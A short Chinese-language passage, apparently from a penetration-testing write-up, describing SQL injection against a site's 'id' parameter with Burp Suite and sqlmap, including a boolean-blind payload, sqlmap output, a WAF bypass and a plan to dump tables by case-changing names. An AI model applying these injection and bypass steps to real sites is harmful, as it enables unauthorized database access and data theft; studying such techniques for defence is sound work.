获取数据值时可以借助burpsuite抓包以及它的intruder模块自动检测。
-------------------------------------------------------------------------
另:使用sqlmap工具进行注入
楼主测试时sqlmap检测到该url含有注入漏洞了,绕过了WAF
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=30 AND 7962=7962
---
然而获取表的时候却成了这样子
------
[16:59:15] [WARNING] no table found
tables: '{}'
-------------
感到了深深的恶意:)
于是想到大小写绕过,利用上边手工注入猜解到的表名列名,直接-T -C --dump得到数据